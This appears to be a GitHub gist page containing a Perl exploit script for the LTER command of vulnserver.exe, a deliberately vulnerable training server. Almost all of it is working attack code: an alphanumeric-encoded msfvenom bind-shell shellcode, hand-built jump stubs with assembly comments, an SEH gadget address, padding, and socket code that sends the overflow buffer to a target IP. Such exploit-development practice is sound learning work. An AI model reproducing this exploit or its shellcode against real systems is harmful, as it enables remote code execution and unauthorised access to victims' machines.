Skip to content

Instantly share code, notes, and snippets.

@0xbadjuju

0xbadjuju/lter2.pl

Created February 14, 2020 18:40
Show Gist options
  • Save 0xbadjuju/22fa19d58025ab4f051d1c79cd31756a to your computer and use it in GitHub Desktop.
Save 0xbadjuju/22fa19d58025ab4f051d1c79cd31756a to your computer and use it in GitHub Desktop.
Download ZIP
vulnserver.exe LTER 2
Raw
lter2.pl
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.2.133");
my $port = 9999;
my $portaddr = sockaddr_in($port, $target);
#0x01 - 0x7f
#45336E45
my $heading = "LTER /.:/";
# msfvenom -p windows/shell_bind_tcp -f perl -e x86/alpha_mixed BUFFERREGISTER=EBX
# Payload size: 710 bytes
my $payload =
"\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4a\x48" .
"\x4c\x42\x33\x30\x35\x50\x33\x30\x61\x70\x4f\x79\x7a\x45" .
"\x66\x51\x4f\x30\x33\x54\x4c\x4b\x62\x70\x34\x70\x6c\x4b" .
"\x31\x42\x44\x4c\x6e\x6b\x51\x42\x65\x44\x6e\x6b\x44\x32" .
"\x67\x58\x64\x4f\x6d\x67\x61\x5a\x74\x66\x30\x31\x6b\x4f" .
"\x4e\x4c\x77\x4c\x55\x31\x61\x6c\x45\x52\x64\x6c\x51\x30" .
"\x59\x51\x48\x4f\x34\x4d\x55\x51\x39\x57\x69\x72\x68\x72" .
"\x53\x62\x62\x77\x4c\x4b\x66\x32\x46\x70\x4e\x6b\x70\x4a" .
"\x47\x4c\x4e\x6b\x72\x6c\x42\x31\x73\x48\x5a\x43\x33\x78" .
"\x56\x61\x5a\x71\x62\x71\x4c\x4b\x43\x69\x77\x50\x67\x71" .
"\x38\x53\x6c\x4b\x73\x79\x46\x78\x48\x63\x47\x4a\x31\x59" .
"\x4e\x6b\x66\x54\x6e\x6b\x53\x31\x59\x46\x46\x51\x59\x6f" .
"\x6c\x6c\x49\x51\x48\x4f\x34\x4d\x35\x51\x39\x57\x35\x68" .
"\x4d\x30\x51\x65\x48\x76\x55\x53\x53\x4d\x4c\x38\x57\x4b" .
"\x43\x4d\x77\x54\x44\x35\x69\x74\x72\x78\x6e\x6b\x36\x38" .
"\x31\x34\x43\x31\x68\x53\x63\x56\x4e\x6b\x54\x4c\x42\x6b" .
"\x6c\x4b\x66\x38\x65\x4c\x55\x51\x4e\x33\x4e\x6b\x44\x44" .
"\x6c\x4b\x73\x31\x5a\x70\x4c\x49\x70\x44\x46\x44\x64\x64" .
"\x31\x4b\x53\x6b\x31\x71\x66\x39\x32\x7a\x62\x71\x69\x6f" .
"\x4d\x30\x43\x6f\x43\x6f\x71\x4a\x4e\x6b\x66\x72\x7a\x4b" .
"\x4c\x4d\x73\x6d\x75\x38\x77\x43\x66\x52\x35\x50\x47\x70" .
"\x45\x38\x43\x47\x42\x53\x56\x52\x43\x6f\x70\x54\x61\x78" .
"\x42\x6c\x63\x47\x51\x36\x76\x67\x6b\x4f\x48\x55\x4c\x78" .
"\x6a\x30\x37\x71\x57\x70\x75\x50\x61\x39\x4f\x34\x76\x34" .
"\x62\x70\x62\x48\x35\x79\x6b\x30\x32\x4b\x73\x30\x39\x6f" .
"\x39\x45\x43\x5a\x74\x48\x31\x49\x42\x70\x6a\x42\x69\x6d" .
"\x57\x30\x72\x70\x61\x50\x70\x50\x72\x48\x58\x6a\x36\x6f" .
"\x6b\x6f\x4b\x50\x39\x6f\x4e\x35\x5a\x37\x73\x58\x76\x62" .
"\x35\x50\x67\x61\x53\x6c\x4d\x59\x4a\x46\x61\x7a\x34\x50" .
"\x56\x36\x43\x67\x65\x38\x49\x52\x49\x4b\x54\x77\x72\x47" .
"\x49\x6f\x7a\x75\x53\x67\x62\x48\x38\x37\x49\x79\x34\x78" .
"\x69\x6f\x6b\x4f\x38\x55\x53\x67\x32\x48\x61\x64\x78\x6c" .
"\x37\x4b\x59\x71\x69\x6f\x49\x45\x42\x77\x4c\x57\x75\x38" .
"\x51\x65\x42\x4e\x32\x6d\x75\x31\x4b\x4f\x4e\x35\x45\x38" .
"\x71\x73\x42\x4d\x50\x64\x43\x30\x4b\x39\x6b\x53\x66\x37" .
"\x31\x47\x56\x37\x30\x31\x7a\x56\x52\x4a\x42\x32\x52\x79" .
"\x72\x76\x78\x62\x39\x6d\x75\x36\x79\x57\x33\x74\x36\x44" .
"\x55\x6c\x37\x71\x36\x61\x4e\x6d\x52\x64\x61\x34\x66\x70" .
"\x78\x46\x45\x50\x43\x74\x70\x54\x62\x70\x73\x66\x62\x76" .
"\x62\x76\x70\x46\x56\x36\x50\x4e\x32\x76\x61\x46\x31\x43" .
"\x43\x66\x50\x68\x61\x69\x7a\x6c\x47\x4f\x4f\x76\x59\x6f" .
"\x7a\x75\x6f\x79\x6b\x50\x42\x6e\x52\x76\x63\x76\x59\x6f" .
"\x34\x70\x71\x78\x43\x38\x6c\x47\x67\x6d\x65\x30\x79\x6f" .
"\x6b\x65\x4d\x6b\x68\x70\x58\x35\x6d\x72\x70\x56\x35\x38" .
"\x4e\x46\x6f\x65\x6f\x4d\x4f\x6d\x39\x6f\x49\x45\x55\x6c" .
"\x45\x56\x53\x4c\x77\x7a\x6d\x50\x79\x6b\x49\x70\x71\x65" .
"\x55\x55\x4f\x4b\x53\x77\x76\x73\x44\x32\x72\x4f\x62\x4a" .
"\x55\x50\x51\x43\x79\x6f\x48\x55\x41\x41";
# JA SHORT 021AFFCC
# JBE SHORT 021AFFCC
my $nseh = "\x77\x06\x76\x04";
my $padding1 = "A" x (((3519 - length($nseh)) - 80 ) - length($payload));
my $padding3 = "B" x 33;
# PUSH ESP
# POP EAX
# SUB AL,40
# PUSH EAX
# POP ESP
# PUSH EBP
# POP EAX
# ADD AX,575
# ADD AL,60
# PUSH EAX
# POP EBX
# AND EAX,554E4D4A
# AND EAX,2A313235
# ADD EAX,41416277
# ADD EAX,41415266
# ADD EAX,41416255
# SUB EAX,33333333
# PUSH EAX
my $long_jmp =
"\x54" .
"\x58" .
"\x2C\x40" .
"\x50" .
"\x5C" .
"\x55" .
"\x58" .
"\x66\x05\x75\x05" .
"\x04\x60" .
"\x50" .
"\x5B" .
"\x25\x4A\x4D\x4E\x55" .
"\x25\x35\x32\x31\x2A" .
"\x05\x77\x62\x41\x41" .
"\x05\x66\x52\x41\x41" .
"\x05\x55\x62\x41\x41" .
"\x2D\x33\x33\x33\x33" .
"\x50";
#0x6250195e pop edi; pop ebp; ret
my $seh = "\x5e\x19\x50\x62";
# PUSH EBP
# POP EAX
# ADD AX,123D
# ADD AL,7F
# PUSH EAX
# POP ESP
# AND EAX,554E4D4A
# AND EAX,2A313235
# ADD EAX,50504076
# ADD EAX,40404075
# PUSH EAX
my $jmp1 =
"\x55" .
"\x58" .
"\x66\x05\x3D\x12" .
"\x04\x7F" .
"\x50" .
"\x5C" .
"\x25\x4A\x4D\x4E\x55" .
"\x25\x35\x32\x31\x2A" .
"\x05\x76\x40\x50\x50" .
"\x05\x75\x40\x40\x40" .
"\x50";
my $padding2 = "C" x 1477;
my $message = $heading . $payload . $padding1 . $long_jmp . $padding3 . $nseh . $seh . $jmp1 . $padding2;
print $message . "\n\n";
print length($message) . "\n\n";
socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
or die "Can't create a socket $!\n";
connect(SOCKET , $portaddr)
or die "Unable to connect to socket $!\n";
send(SOCKET, $message, 0) == length($message)
or die "cannot send to $target($port): $!";
close SOCKET or die "close: $!"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment